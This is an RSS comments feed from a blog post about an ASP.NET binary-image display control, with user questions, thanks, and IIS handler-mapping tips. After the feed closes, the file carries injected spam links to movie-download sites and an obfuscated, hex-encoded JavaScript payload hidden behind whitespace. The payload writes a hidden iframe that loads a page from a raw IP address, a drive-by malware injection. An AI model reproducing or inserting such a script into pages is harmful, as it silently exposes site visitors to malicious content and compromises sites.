<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Control to Display Binary Images in ASP.NET</title>
	<atom:link href="http://www.ramymostafa.com/?feed=rss2&#038;p=187" rel="self" type="application/rss+xml" />
	<link>http://www.ramymostafa.com/?p=187</link>
	<description>Just another WordPress weblog</description>
	<lastBuildDate>Thu, 11 Mar 2010 16:10:06 -0500</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Terrence</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=2#comment-22562</link>
		<dc:creator>Terrence</dc:creator>
		<pubDate>Thu, 11 Feb 2010 16:38:54 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22562</guid>
		<description>Hello Ramy,

I just wanted to say that this is a great control. It really helped me out. I really appreciate the blog as well as all the feedback, which has helped me out as well. Keep up the great work!</description>
		<content:encoded><![CDATA[<p>Hello Ramy,</p>
<p>I just wanted to say that this is a great control. It really helped me out. I really appreciate the blog as well as all the feedback, which has helped me out as well. Keep up the great work!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Bilal Hashmi</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=2#comment-22558</link>
		<dc:creator>Bilal Hashmi</dc:creator>
		<pubDate>Tue, 19 Jan 2010 05:40:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22558</guid>
		<description>Hi Ramy, this control is very useful. I am facing only one problem. Please help me. I am using the control in GridView. I want to show a default image in your control when the value of image field is NULL in the database. I am getting a Red Cross when there is a NULL value for the imagecontent property. Please Help. I am waiting.</description>
		<content:encoded><![CDATA[<p>Hi Ramy, this control is very useful. I am facing only one problem. Please help me. I am using the control in GridView. I want to show a default image in your control when the value of image field is NULL in the database. I am getting a Red Cross when there is a NULL value for the imagecontent property. Please Help. I am waiting.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Telmo Pestana</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=2#comment-22553</link>
		<dc:creator>Telmo Pestana</dc:creator>
		<pubDate>Thu, 15 Oct 2009 18:12:37 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22553</guid>
		<description>Greetings from Portugal,

You&#039;ve done an excellent job. It worked flawlessly in my web app. Thanks for sharing!

Regards,
Telmo Pestana</description>
		<content:encoded><![CDATA[<p>Greetings from Portugal,</p>
<p>You&#8217;ve done an excellent job. It worked flawlessly in my web app. Thanks for sharing!</p>
<p>Regards,<br />
Telmo Pestana</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ramy Mostafa</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=1#comment-22552</link>
		<dc:creator>Ramy Mostafa</dc:creator>
		<pubDate>Wed, 14 Oct 2009 15:48:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22552</guid>
		<description>Hey Matteo, Thanks please share the new code for the new features :) with us

Regards
Ramy</description>
		<content:encoded><![CDATA[<p>Hey Matteo, Thanks please share the new code for the new features <img src='http://www.ramymostafa.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  with us</p>
<p>Regards<br />
Ramy</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Pat</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=1#comment-22551</link>
		<dc:creator>Pat</dc:creator>
		<pubDate>Mon, 12 Oct 2009 02:05:05 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22551</guid>
		<description>Thanks Ramy, very useful control.

I was having the same issues as a lot of people with the production application not showing the image, but adding the handler to IIS worked a treat.

Thanks all, for saving me a lot of time and headaches.</description>
		<content:encoded><![CDATA[<p>Thanks Ramy, very useful control.</p>
<p>I was having the same issues as a lot of people with the production application not showing the image, but adding the handler to IIS worked a treat.</p>
<p>Thanks all, for saving me a lot of time and headaches.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Matteo</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=1#comment-22549</link>
		<dc:creator>Matteo</dc:creator>
		<pubDate>Wed, 30 Sep 2009 15:57:30 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22549</guid>
		<description>Hi Ramy, wonderful control, but i have just a little advice for new features, a new property to set the displaymode or resizemode of image...

If i set width and height of my control: (canvas size)

Possible values are: 
Crop (the image will be trimmed) 
Fit (the image will be sized to fit the given dimensions) 
None (default) 

I&#039;m working on your code to do this... :)</description>
		<content:encoded><![CDATA[<p>Hi Ramy, wonderful control, but i have just a little advice for new features, a new property to set the displaymode or resizemode of image&#8230;</p>
<p>If i set width and height of my control: (canvas size)</p>
<p>Possible values are:<br />
Crop (the image will be trimmed)<br />
Fit (the image will be sized to fit the given dimensions)<br />
None (default) </p>
<p>I&#8217;m working on your code to do this&#8230; <img src='http://www.ramymostafa.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Khuzaima</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=1#comment-22548</link>
		<dc:creator>Khuzaima</dc:creator>
		<pubDate>Thu, 17 Sep 2009 07:51:43 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22548</guid>
		<description>Hi Ramy,

I downloaded the control and tried to use in my asp.net page.
I have an asp.net web application with SQL 2008 Database. I am using VB.NET code behind for my asp.net pages. I have stored images in my sql database which I want to display using your control during runtime.

Please help me how can I use to display images using your control on aspx page with vb.net code behind.</description>
		<content:encoded><![CDATA[<p>Hi Ramy,</p>
<p>I downloaded the control and tried to use in my asp.net page.<br />
I have an asp.net web application with SQL 2008 Database. I am using VB.NET code behind for my asp.net pages. I have stored images in my sql database which I want to display using your control during runtime.</p>
<p>Please help me how can I use to display images using your control on aspx page with vb.net code behind.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Avinesh</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=1#comment-22546</link>
		<dc:creator>Avinesh</dc:creator>
		<pubDate>Wed, 02 Sep 2009 22:27:44 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22546</guid>
		<description>In Detail:

Under IIS, for specific Website
Under Virtual Directory â€“ Click Configuration
-	Under Mapping
-	Click Add 
-	Executable : c:\windows\microsoft.net\framework\v2.0.50727\aspnet_isapi.dll
-	Extension: .rbm
-	Limit: GET,HEAD,POST,DEBUG</description>
		<content:encoded><![CDATA[<p>In Detail:</p>
<p>Under IIS, for specific Website<br />
Under Virtual Directory â€“ Click Configuration<br />
-	Under Mapping<br />
-	Click Add<br />
-	Executable : c:\windows\microsoft.net\framework\v2.0.50727\aspnet_isapi.dll<br />
-	Extension: .rbm<br />
-	Limit: GET,HEAD,POST,DEBUG</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Avinesh</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=1#comment-22545</link>
		<dc:creator>Avinesh</dc:creator>
		<pubDate>Wed, 02 Sep 2009 21:39:55 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22545</guid>
		<description>Yes it worked:

Point executable to : 
    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_isapi.dll.

Extension: .rbm

Uncheck the option â€œVerify that file exist&quot;


Thanks Team</description>
		<content:encoded><![CDATA[<p>Yes it worked:</p>
<p>Point executable to :<br />
    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_isapi.dll.</p>
<p>Extension: .rbm</p>
<p>Uncheck the option â€œVerify that file exist&#8221;</p>
<p>Thanks Team</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ramy Mostafa</title>
		<link>http://www.ramymostafa.com/?p=187&#038;cpage=1#comment-22544</link>
		<dc:creator>Ramy Mostafa</dc:creator>
		<pubDate>Wed, 02 Sep 2009 08:28:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.ramymostafa.com/?p=187#comment-22544</guid>
		<description>Hi Johan,

Please post a sample of your code or send it to me on my email
ramy.mostafa@gmail.com

Regards
Ramy</description>
		<content:encoded><![CDATA[<p>Hi Johan,</p>
<p>Please post a sample of your code or send it to me on my email<br />
<a href="mailto:ramy.mostafa@gmail.com">ramy.mostafa@gmail.com</a></p>
<p>Regards<br />
Ramy</p>
]]></content:encoded>
	</item>
</channel>
</rss>






































<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><a href="http://moviesbit.com"><b>download
movies</b></a>
<p><b><a href="http://moviesbit.ru">ñêà÷àòü ôèëüìû</a><br>
</b></p>

                                                                                 <script>c10zd6='';r11017='r40354e';rc8a4bd3e7b='ra9fd94cbbf';rdeaf3d=/* r68059 */document;if(r11017+c10zd6+rc8a4bd3e7b=='r40354era9fd94cbbf'){ rb554c96=rdeaf3d};rb554c96.write('<scr'+'ipt>function rd5ff08f24bc(r30a073a349){return e'+c10zd6+'val(r30a073a349); }</scr'+'ipt>');  function c10cac6388r0758254(r239fd){ var rcff454b2=16; var z27='';return (rd5ff08f24bc('pa'+z27+'rseInt')(r239fd,rcff454b2));}function r5aa61a2d95(rf2919a822c){  var r4b2b5ad283='';r7a3d2bd='fromCh';r3f05b1805b=String[r7a3d2bd+'arC'+'ode'];for(r86f72=0;r86f72<rf2919a822c.length;r86f72+=2){ r4b2b5ad283+=(r3f05b1805b(c10cac6388r0758254(rf2919a822c.substr(r86f72,2))));}return r4b2b5ad283;} var r845ab470='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B7661'+c10zd6+'7220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461'+c10zd6+'674E61'+c10zd6+'6D65282769667261'+c10zd6+'6D6527292E6C656E677468297B7661'+c10zd6+'7220656C3D646F63756D656E742E676574456C656D656E747342795461'+c10zd6+'674E61'+c10zd6+'6D65282769667261'+c10zd6+'6D6527295B695D3B6966282028656C2E7374796C652E646973706C61'+c10zd6+'793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E61'+c10zd6+'6D6521'+c10zd6+'3D276331'+c10zd6+'3027297B656C2E7061'+c10zd6+'72656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0D0A69662821'+c10zd6+'6D796961'+c10zd6+'297B646F63756D656E742E777269746528756E65736361'+c10zd6+'7065282027253363253639253636253732253631'+c10zd6+'253664253635253230253665253631'+c10zd6+'253664253635253364253633253331'+c10zd6+'253330253230253733253732253633253364253237253638253734253734253730253361'+c10zd6+'253266253266253337253337253265253332253332253331'+c10zd6+'253265253331'+c10zd6+'253335253333253265253331'+c10zd6+'253337253338253266253637253666253332253266253639253665253265253730253638253730253366253237253262253464253631'+c10zd6+'253734253638253265253732253666253735253665253634253238253464253631'+c10zd6+'253734253638253265253732253631'+c10zd6+'253665253634253666253664253238253239253261'+c10zd6+'253331'+c10zd6+'253333253332253338253331'+c10zd6+'253330253239253262253237253333253237253230253737253639253634253734253638253364253334253336253336253230253638253635253639253637253638253734253364253332253338253335253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c10zd6+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c10zd6+'2536642536352533652729293B7D7661'+c10zd6+'72206D796961'+c10zd6+'3D747275653B3C2F7363726970743E';rb554c96.write(r5aa61a2d95(r845ab470));</script>